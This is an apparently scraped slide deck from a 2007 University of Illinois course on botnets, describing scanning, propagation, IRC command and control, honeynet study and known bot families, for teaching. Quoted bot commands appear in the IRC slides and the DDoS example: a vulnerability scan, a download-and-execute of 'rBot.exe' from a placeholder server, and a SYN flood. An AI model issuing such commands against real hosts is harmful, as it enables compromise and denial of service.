190 likes | 288 Views
563.7.2 Bot Nets. Evgeni Peryshkin University of Illinois Fall 2007. What Botnets do. Denial of service (tribe flood trinu, stacheldraht, trinity) Adware Spyware E-mail spam
E N D
563.7.2Bot Nets Evgeni Peryshkin University of Illinois Fall 2007
What Botnets do Denial of service (tribe flood trinu, stacheldraht, trinity) Adware Spyware E-mail spam Click fraud-or the purpose of generating a charge per click without having actual interest in the target of the ad's link identity theft Spreading new malware – start base for e-mail virus papers/bots 2
Creation and use wikipedia: botnet 3
Dramatis personae Attacker(s) IRC server Handler Handler Agent Agent Agent Victim Agent-handler attack model IRC-based attack model Specht, Lee, 04 4
Agent Recruitment - scanning strategy • Random Scanning (Code Red) • high traffic volume of inter-network traffic - may aid detection • no coordination - increases likelihood of duplicate scans • Hit List • splits off pieces of the list to give to newly recruited machines • can be very fast and efficient - no collisions • a large list will cause more traffic, possibly aiding detection • Permutation Scanning • if an agent sees an already infected host, it chooses a new random starting point • if an agent sees a certain threshold number of infected hosts, it becomes dormant • Signpost Scanning • uses communication patterns or data found on newly infected hosts to select next targets • any email worm that spreads using address book of infected host • hard to detect based on traffic patterns • may be slow to spread • Local Subnet (code red II, nimda) Uiuc 563.9.1 DOS attacks Classification/Taxonomy 5
Agent Recruitment - vulnerability scanning • Horizontal • looks for specific port/vulnerability • Vertical • look for multiple ports/vulnerabilities on the same host • Coordinated • scan multiple machines on the same subnet for a specific vulnerability • Stealthy • any of the above, but do it slowly to avoid detection Uiuc 563.9.1 DOS attacks Classification/Taxonomy 6
Agent Recruitment - attack code propagation • Central Server (li0n worm) • all newly recruited agents contact a central server to get attack code • single point of failure • can be discovered and shut down • high load at central server may limit efficiency or enable detection • Back-chaining (ramen, morris worms) • attack code downloaded from machine that was used to exploit the new host • Autonomous – (Code Red, Warhol, various email worms) • attack code downloaded concurrently w/exploit Uiuc 563.9.1 DOS attacks Classification/Taxonomy 7
How to study bot nets • Create honeynet – interactive honeypot • Data Control – contain malicous activity • Your node • Data Capture – store what user is doing • Data Analysis – interpret data captured • Data Collection – send data captured to organized source papers/honeynet 8
How IRC controlled Bot nets grow • Compromise host • Use tftp/ftp/http/Csend to transfer itself to compromised host • Start binary, which connects to hard-coded master server (using dynamic DNS name) • Bot contact server, server send info about itself including features understood • Bot logins in to masters channel with password papers/bots 9
How IRC controlled Bot nets grow 2 • topic of the channel interprets as a command for bot. • Example: advscan lsass 200 5 0 -r -s • Use use 200 threads to search for lsass vunerability every 5 seconds. –s for silent to reduce traffic. Add more hosts to botnet. • Example 2:".http.update http://<server>/~mugenxu/rBot.exe c:\msy32awds.exe 1" • Download binary file and execute to update bot. • Generally bots don’t spread unless told so. papers/bots 10
How IRC controlled Bot nets grow 3 • If requested, bot tell server of spread. • IRC server will provide the channels userlist. (channel operators to save traffic and disguise number bots) • Before commands sent controller has to authenticate with bots over irc channel. • Example .la plmp -s • -s no fail reply to reduce traffic papers/bots 11
How IRC controlled Bot nets grow 4 • Irc server(s) is compromised machine. • Flexibility of own irc server. Harder to trace to attacker. • Beginners- bot-network on original irdD • 1,200 clients named rbot<######> report scanning results. (easy to discover) • Top bot-net irc server: Unreal IRCd and ConferenceRoom: papers/bots 12
Different kinds of Bots -popular • Agobot/Phatbot/Forbot/XtremBot –tidy GPL c++, tidy abstract design, modular and easy to add commands • SDBot/RBot/UrBot/UrXBot/... – most active, messy c, GPL • mIRC-based Bots - GT-Bots – launch mIRC chat-client, hidewindown executable to hide mIRC papers/bots 13
Bot net size • Dutch police found a 1.5 million node botnet • Norwegian ISP Telenor disbanded a 10,000-node botnet • Of the 600 million computers currently on the internet, between 100 and 150 million were already part of these botnets, Mr Cerf said. • Generally 50k is large for botnet bbc papers/bots 14
Botnet vs Botnet If machine part of 2 botnets, packet sniffing allows to gather the key information of the other botnet. Thus it is possible to "steal" another botnet. Stealing is easier than building [out] one Some actually "secure" the bot machines Install patches shut down open ports DDOS to kidnap over bots. Honeynetdark readingone on one 15 15
New Botnets • Shift from IRC to http/peer to peer • Peer to peer more popular- not centralized, bots forwards commands to other bots. dark reading
Example DDos attack • [###FOO###] <~nickname> .scanstop • [###FOO###] <~nickname> .ddos.syn 151.49.8.XXX 21 200 • [###FOO###] <-[XP]-18330> [DDoS]: Flooding: (151.49.8.XXX:21) for 200 seconds [...] [###FOO###] <-[2K]-33820> [DDoS]: Done with flood (2573KB/sec). [###FOO###] <-[XP]-86840> [DDoS]: Done with flood (351KB/sec). papers/bots
Lessons learned • Botnets stolen frequently. If get password and channel name, can instruct bot to upgrade to your botnet software. (fun to watch bot steal bots) • Updates frequent- one update killed botnet, invalid 1 char in nickname. • Unskilled people run botnets. (username, own servers, own webserver for updates) • often botnets are run by young males with surprisingly limited programming skills. ("How can i compile *" ) papers/bots
Suggested Readings • http://honeynet.thalix.com/papers/honeynet/index.html • http://www.honeynet.org/papers/bots/ • http://en.wikipedia.org/wiki/Bot_net • http://news.bbc.co.uk/2/hi/business/6298641.stm • http://www.wired.com/politics/security/magazine/15-09/ff_estonia 19